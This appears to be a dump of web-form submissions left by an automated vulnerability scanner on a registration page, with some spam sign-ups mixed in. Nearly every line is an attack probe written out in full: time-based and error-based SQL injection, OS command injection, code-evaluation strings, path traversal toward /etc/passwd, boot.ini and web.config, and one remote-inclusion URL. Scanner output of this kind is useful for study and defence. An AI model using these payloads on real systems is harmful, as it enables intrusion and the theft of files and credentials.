/../../../../../../../../../../../etc/passwd.cgi
Smith 3 '+print(int)0xFFF9999-22+'
Smith 3 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
Smith /../../../../../../../../../../../etc/passwd.cgi netsparker@example.com
"+print(int)0xFFF9999-22+"
';SELECT pg_sleep(25)--
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith 3 "+print(int)0xFFF9999-22+"
Smith 3 ';SELECT pg_sleep(25)--
Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd netsparker@example.com
1;SELECT pg_sleep(25)--
Smith 3
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
Smith 3 1;SELECT pg_sleep(25)--
{php}print(int)0xFFF9999-22;{/php}
Smith ns../../../../../../../../../../../boot.ini....................................................................................................................................................................................... netsparker@example.com
SELECT pg_sleep(25)--
/../../../../../../../../../../../etc/passwd
Smith 3 {php}print(int)0xFFF9999-22;{/php}
Smith 3 SELECT pg_sleep(25)--
Smith /../../../../../../../../../../../etc/passwd netsparker@example.com
'{${print(int)0xFFF9999-22}}'
1);SELECT pg_sleep(25)--
/etc/passwd
Smith 3 '{${print(int)0xFFF9999-22}}'
Smith 3 1);SELECT pg_sleep(25)--
[php]print(int)0xFFF9999-22;[/php]
');SELECT pg_sleep(25)--
Smith /etc/passwd netsparker@example.com
Smith 3 [php]print(int)0xFFF9999-22;[/php]
Smith 3 ');SELECT pg_sleep(25)--
reg.cgi
print localtime()*0+0xFFF9999-22
'));SELECT pg_sleep(25)--
Smith reg.cgi netsparker@example.com
Smith 3 '));SELECT pg_sleep(25)--
Smith 3 print localtime()*0+0xFFF9999-22
reg.cgi
1));SELECT pg_sleep(25)--
Smith reg.cgi netsparker@example.com
eval('print localtime()*0+0xFFF9999-22')
Smith 3 1));SELECT pg_sleep(25)--
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith 3 eval('print localtime()*0+0xFFF9999-22')
((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith data:;base64,TlM3NzU0NTYxNDQ2NTc1 netsparker@example.com
'+print localtime()*0+0xFFF9999-22+'
Smith 3 ((SELECT 1 FROM (SELECT SLEEP(25))A))
/Events/DiVA-July2004/reg.cgi
Smith 3 '+print localtime()*0+0xFFF9999-22+'
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith /Events/DiVA-July2004/reg.cgi netsparker@example.com
"+print localtime()*0+0xFFF9999-22+"
Smith 3 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
/DiVA-July2004/reg.cgi
Smith 3 "+print localtime()*0+0xFFF9999-22+"
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith /DiVA-July2004/reg.cgi netsparker@example.com
Smith 3 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
file%3a%2fboot.ini
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith file%3a%2fboot.ini netsparker@example.com
Smith 3 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
c%3a%5cboot.ini
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
Smith c%3a%5cboot.ini netsparker@example.com
Smith 3 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
/../../../../../../../../../../boot.ini
Smith 3 /../../../../../../../../../../boot.ini
/../../../../../../../../../../web.config
Smith 3 /../../../../../../../../../../web.config
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
Smith 3 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
/../../../../../../../../../../boot.ini.cgi
Smith 3 /../../../../../../../../../../boot.ini.cgi
/../../../../../../../../../../boot.ini
Smith 3 /../../../../../../../../../../boot.ini
file:/windows/win.ini
Smith 3 file:/windows/win.ini
file:/boot.ini
Smith 3 file:/boot.ini
/../../../../../../../../../../windows/win.ini
Smith 3 /../../../../../../../../../../windows/win.ini
/../../../../../../../../../../windows/win.ini.cgi
Smith 3 /../../../../../../../../../../windows/win.ini.cgi
c:\windows\win.ini
Smith 3 c:\windows\win.ini
c:\boot.ini
Smith 3 c:\boot.ini
/../../../../../../../../../../windows/iis6.log
Smith 3 /../../../../../../../../../../windows/iis6.log
/../../../../../../../../../../proc/self/fd/2
Smith 3 /../../../../../../../../../../proc/self/fd/2
/../../../../../../../../../../proc/self/fd/2.cgi
Smith 3 /../../../../../../../../../../proc/self/fd/2.cgi
/../../../../../../../../../../etc/httpd/logs/error.log
Smith 3 /../../../../../../../../../../etc/httpd/logs/error.log
/../../../../../../../../../../etc/httpd/logs/error_log
Smith 3 /../../../../../../../../../../etc/httpd/logs/error_log
/../../../../../../../../../../var/log/apache2/error.log
Smith 3 /../../../../../../../../../../var/log/apache2/error.log
/../../../../../../../../../../var/log/apache/error.log
Smith 3 /../../../../../../../../../../var/log/apache/error.log
/../../../../../../../../../../proc/version
Smith 3 /../../../../../../../../../../proc/version
/../../../../../../../../../../proc/version.cgi
Smith 3 /../../../../../../../../../../proc/version.cgi
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
file:///etc/passwd
Smith 3 file:///etc/passwd
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd.cgi
Smith 3 /../../../../../../../../../../../etc/passwd.cgi
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith 3 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
Smith 3 ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
/etc/passwd
Smith 3 /etc/passwd
reg.cgi
Smith 3 reg.cgi
reg.cgi
Smith 3 reg.cgi
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith 3 data:;base64,TlM3NzU0NTYxNDQ2NTc1
/Events/DiVA-July2004/reg.cgi
Smith 3 /Events/DiVA-July2004/reg.cgi
/DiVA-July2004/reg.cgi
Smith 3 /DiVA-July2004/reg.cgi
file%3a%2fboot.ini
Smith 3 file%3a%2fboot.ini
c%3a%5cboot.ini
Smith 3 c%3a%5cboot.ini
Smith 3 netsparker@example.com
JimmiXS lzcvfBXFYAOr jimos4581rt@hotmail.com
JimmiXS TIGXJjrcpH jimos4581rt@hotmail.com
qyybjeg EInYKyaIwFlBPB awxaib@oikrcd.com
khgbbwcrggb OnuXfLRmQSwtjsfex pihejz@pufdts.com
qjgevft EgBSQoUMbCuQXrEymS oonppf@cwwyto.com
afwiblc tEqGnyfqSpUmv fptnxx@hpjxji.com
qonbll qJaOkBcrIrPDjGY gkbcbe@cwglpk.com
iixjnmjjhv WOTBTBEaltQx ucxlfq@tmqmzh.com
lbvdkush rAzJRLamQwiINhcOd rsfrom@cdwthv.com
gnwnyxa BgAIakRSlquUP ctzjrx@isinfu.com
fprgbakjk IdwAOuoovTmoJ ecfugn@secoky.com
zjxxikl OulmwazOScqDxA ssdjpc@wmkyie.com
abuaxxek iCTbZamaVkr zjsiuf@bblpan.com
oyuzgm FQULrMaHzStWyqWv yofdyc@qrzoaq.com
rkqjiovc oKsKwsObPKKqohpIVwJ kheych@yfvnjd.com
fbjmghsvjtm DfXzmJpgZSKycXR nteyif@ugepke.com
Smith 3 netsparker@example.com
Smith 3 netsparker@example.com
%27
-1 OR 1=1 3 netsparker@example.com
%27 3 netsparker@example.com
' WAITFOR DELAY '0:0:25'--
'"-->
-1 OR 1=1 3 netsparker@example.com
"& SET /A 0xFFF9999-2 &
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
' 3 netsparker@example.com
"& SET /A 0xFFF9999-2 & 3 netsparker@example.com
' WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
NS1NO 3 netsparker@example.com
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) 3 netsparker@example.com
'& SET /A 0xFFF9999-2 &
1 AND 'NS='ss 3 netsparker@example.com
1 WAITFOR DELAY '0:0:25'--
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
'& SET /A 0xFFF9999-2 & 3 netsparker@example.com
'"--> 3 netsparker@example.com
' OR 1=1 OR 'ns'='ns 3 netsparker@example.com
1 WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' 3 netsparker@example.com
-1 OR 17-7=10 3 netsparker@example.com
& SET /A 0xFFF9999-2 &
WAITFOR DELAY '0:0:25'--
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
"& ping -n 25 127.0.0.1 &
1 OR X='ss 3 netsparker@example.com
WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
& SET /A 0xFFF9999-2 & 3 netsparker@example.com
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) 3 netsparker@example.com
"& ping -n 25 127.0.0.1 & 3 netsparker@example.com
' OR 1=1 OR '1'='1 3 netsparker@example.com
'"-->
1) WAITFOR DELAY '0:0:25'--
SET /A 0xFFF9999-2 &
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
' OR 1=1 OR '1'='1 3 netsparker@example.com
'& ping -n 25 127.0.0.1 &
1) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
SET /A 0xFFF9999-2 & 3 netsparker@example.com
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' 3 netsparker@example.com
-1 OR 1=1 3 netsparker@example.com
'& ping -n 25 127.0.0.1 & 3 netsparker@example.com
') WAITFOR DELAY '0:0:25'--
Smith '"--> netsparker@example.com
SET /A 0xFFF9999-2
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
-1 OR 1=1 3 netsparker@example.com
& ping -n 25 127.0.0.1 &
') WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
SET /A 0xFFF9999-2 3 netsparker@example.com
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' 3 netsparker@example.com
' 3 netsparker@example.com
')) WAITFOR DELAY '0:0:25'--
& ping -n 25 127.0.0.1 & 3 netsparker@example.com
"&expr 268409241 - 2 &"
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
NS1NO 3 netsparker@example.com
')) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
"&expr 268409241 - 2 &" 3 netsparker@example.com
1 AND 'NS='ss 3 netsparker@example.com
ping -n 25 127.0.0.1 &
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) 3 netsparker@example.com
'"-->
1)) WAITFOR DELAY '0:0:25'--
'&expr 268409241 - 2 &'
' OR 1=1 OR 'ns'='ns 3 netsparker@example.com
ping -n 25 127.0.0.1 & 3 netsparker@example.com
1)) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
-1 OR 17-7=10 3 netsparker@example.com
'&expr 268409241 - 2 &' 3 netsparker@example.com
"&ping -c 25 127.0.0.1 &"
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 3 netsparker@example.com
Smith 3 '"-->
1 OR X='ss 3 netsparker@example.com
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
&expr 268409241 - 2 &
"&ping -c 25 127.0.0.1 &" 3 netsparker@example.com
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
' OR 1=1 OR '1'='1 3 netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
&expr 268409241 - 2 & 3 netsparker@example.com
'&ping -c 25 127.0.0.1 &'
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" 3 netsparker@example.com
' OR 1=1 OR '1'='1 3 netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
expr 268409241 - 2 &
'&ping -c 25 127.0.0.1 &' 3 netsparker@example.com
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
Smith -1 OR 1=1 netsparker@example.com
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith 3 netsparker@example.com
expr 268409241 - 2 & 3 netsparker@example.com
&ping -c 25 127.0.0.1 &
Smith -1 OR 1=1 netsparker@example.com
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) 3 netsparker@example.com
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
expr 268409241 - 2
&ping -c 25 127.0.0.1 & 3 netsparker@example.com
Smith ' netsparker@example.com
expr 268409241 - 2 3 netsparker@example.com
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
ping -c 25 127.0.0.1 &
Smith 3 netsparker@example.com
Smith NS1NO netsparker@example.com
268409239
ping -c 25 127.0.0.1 & 3 netsparker@example.com
Smith 1 AND 'NS='ss netsparker@example.com
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) 3 netsparker@example.com
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
Smith ' OR 1=1 OR 'ns'='ns netsparker@example.com
ping -n 25 127.0.0.1
268409239 3 netsparker@example.com
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
Smith 3 netsparker@example.com
Smith -1 OR 17-7=10 netsparker@example.com
ping -n 25 127.0.0.1 3 netsparker@example.com
|expr${IFS}268409241${IFS}-${IFS}2
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 3 netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' 3 netsparker@example.com
/../../../../../../../../../../boot.ini
Smith 1 OR X='ss netsparker@example.com
ping -c 25 127.0.0.1
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
/../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith ' OR 1=1 OR '1'='1 netsparker@example.com
ping -c 25 127.0.0.1 3 netsparker@example.com
((select sleep(25)))a-- 1
|expr${IFS}268409241${IFS}-${IFS}2 3 netsparker@example.com
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) 3 netsparker@example.com
/../../../../../../../../../../boot.ini.cgi
Smith ' OR 1=1 OR '1'='1 netsparker@example.com
"& ping -n 25 127.0.0.1 &
((select sleep(25)))a-- 1 3 netsparker@example.com
"& SET /A 0xFFF9999-2 &
Smith -1 OR 1=1 netsparker@example.com
NSFTW
/../../../../../../../../../../boot.ini.cgi 3 netsparker@example.com
Smith "& ping -n 25 127.0.0.1 & netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
NSFTW 3 netsparker@example.com
/../../../../../../../../../../boot.ini
'& ping -n 25 127.0.0.1 &
Smith ' netsparker@example.com
Smith "& SET /A 0xFFF9999-2 & netsparker@example.com
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) 3 netsparker@example.com
'+NSFTW+'
/../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith NS1NO netsparker@example.com
Smith '& ping -n 25 127.0.0.1 & netsparker@example.com
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
'+NSFTW+' 3 netsparker@example.com
file:/boot.ini
Smith 1 AND 'NS='ss netsparker@example.com
& ping -n 25 127.0.0.1 &
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' 3 netsparker@example.com
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith ' OR 1=1 OR 'ns'='ns netsparker@example.com
'& SET /A 0xFFF9999-2 &
Smith & ping -n 25 127.0.0.1 & netsparker@example.com
file:/boot.ini 3 netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
Smith -1 OR 17-7=10 netsparker@example.com
Smith '& SET /A 0xFFF9999-2 & netsparker@example.com
c:\boot.ini
ping -n 25 127.0.0.1 &
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 3 netsparker@example.com
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) 3 netsparker@example.com
& SET /A 0xFFF9999-2 &
c:\boot.ini 3 netsparker@example.com
Smith 1 OR X='ss netsparker@example.com
Smith ping -n 25 127.0.0.1 & netsparker@example.com
';SELECT pg_sleep(25)--
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith & SET /A 0xFFF9999-2 & netsparker@example.com
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
';SELECT pg_sleep(25)-- 3 netsparker@example.com
"&ping -c 25 127.0.0.1 &"
Smith ' OR 1=1 OR '1'='1 netsparker@example.com
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 3 netsparker@example.com
SET /A 0xFFF9999-2 &
ns../../../../../../../../../../../boot.ini....................................................................................................................................................................................... 3 netsparker@example.com
Smith ' OR 1=1 OR '1'='1 netsparker@example.com
1;SELECT pg_sleep(25)--
Smith "&ping -c 25 127.0.0.1 &" netsparker@example.com
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
Smith SET /A 0xFFF9999-2 & netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
Smith 3 -1 OR 1=1
1;SELECT pg_sleep(25)-- 3 netsparker@example.com
'&ping -c 25 127.0.0.1 &'
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 3 netsparker@example.com
SET /A 0xFFF9999-2
Smith 3 -1 OR 1=1
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini 3 netsparker@example.com
SELECT pg_sleep(25)--
Smith '&ping -c 25 127.0.0.1 &' netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
Smith 3 '
Smith SET /A 0xFFF9999-2 netsparker@example.com
SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 NS1NO
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 3 netsparker@example.com
"&expr 268409241 - 2 &"
file%3a%2fboot.ini
&ping -c 25 127.0.0.1 &
1);SELECT pg_sleep(25)--
Smith 3 1 AND 'NS='ss
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith "&expr 268409241 - 2 &" netsparker@example.com
file%3a%2fboot.ini 3 netsparker@example.com
Smith &ping -c 25 127.0.0.1 & netsparker@example.com
Smith 3 ' OR 1=1 OR 'ns'='ns
1);SELECT pg_sleep(25)-- 3 netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) 3 netsparker@example.com
'&expr 268409241 - 2 &'
c%3a%5cboot.ini
ping -c 25 127.0.0.1 &
Smith 3 -1 OR 17-7=10
');SELECT pg_sleep(25)--
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith '&expr 268409241 - 2 &' netsparker@example.com
c%3a%5cboot.ini 3 netsparker@example.com
Smith 3 1 OR X='ss
Smith ping -c 25 127.0.0.1 & netsparker@example.com
');SELECT pg_sleep(25)-- 3 netsparker@example.com
&expr 268409241 - 2 &
/../../../../../../../../../../web.config
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' 3 netsparker@example.com
Smith 3 ' OR 1=1 OR '1'='1
ping -n 25 127.0.0.1
Smith &expr 268409241 - 2 & netsparker@example.com
Smith 3 ' OR 1=1 OR '1'='1
%27
Smith ping -n 25 127.0.0.1 netsparker@example.com
/../../../../../../../../../../web.config 3 netsparker@example.com
expr 268409241 - 2 &
Smith 3 -1 OR 1=1
ping -c 25 127.0.0.1
Smith %27 netsparker@example.com
'));SELECT pg_sleep(25)--
Smith expr 268409241 - 2 & netsparker@example.com
/../../../../../../../../../../windows/win.ini
Smith 3 -1 OR 1=1
Smith ping -c 25 127.0.0.1 netsparker@example.com
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
'));SELECT pg_sleep(25)-- 3 netsparker@example.com
expr 268409241 - 2
/../../../../../../../../../../windows/win.ini 3 netsparker@example.com
Smith 3 '
"& ping -n 25 127.0.0.1 &
Smith (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) netsparker@example.com
1));SELECT pg_sleep(25)--
Smith expr 268409241 - 2 netsparker@example.com
Smith 3 NS1NO
file:/windows/win.ini
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
Smith 3 "& ping -n 25 127.0.0.1 &
1));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 1 AND 'NS='ss
268409239
file:/windows/win.ini 3 netsparker@example.com
((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' netsparker@example.com
'& ping -n 25 127.0.0.1 &
Smith 3 ' OR 1=1 OR 'ns'='ns
Smith 268409239 netsparker@example.com
/../../../../../../../../../../windows/win.ini.cgi
((SELECT 1 FROM (SELECT SLEEP(25))A)) 3 netsparker@example.com
Smith 3 -1 OR 17-7=10
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
|expr${IFS}268409241${IFS}-${IFS}2
Smith 3 '& ping -n 25 127.0.0.1 &
/../../../../../../../../../../windows/win.ini.cgi 3 netsparker@example.com
Smith 3 1 OR X='ss
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) netsparker@example.com
Smith |expr${IFS}268409241${IFS}-${IFS}2 netsparker@example.com
& ping -n 25 127.0.0.1 &
c:\windows\win.ini
Smith 3 ' OR 1=1 OR '1'='1
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' 3 netsparker@example.com
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
"& SET /A 0xFFF9999-2 &
Smith 3 & ping -n 25 127.0.0.1 &
Smith 3 ' OR 1=1 OR '1'='1
c:\windows\win.ini 3 netsparker@example.com
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
hTTp://r87.com/n
....//....//....//....//....//....//....//....//....//....//....//windows\win.ini
Smith 3 "& SET /A 0xFFF9999-2 &
ping -n 25 127.0.0.1 &
Smith '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' netsparker@example.com
hTTp://r87.com/n 3 netsparker@example.com
....//....//....//....//....//....//....//....//....//....//....//windows\win.ini 3 netsparker@example.com
'& SET /A 0xFFF9999-2 &
http://r87.com/n?.cgi
Smith 3 ping -n 25 127.0.0.1 &
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
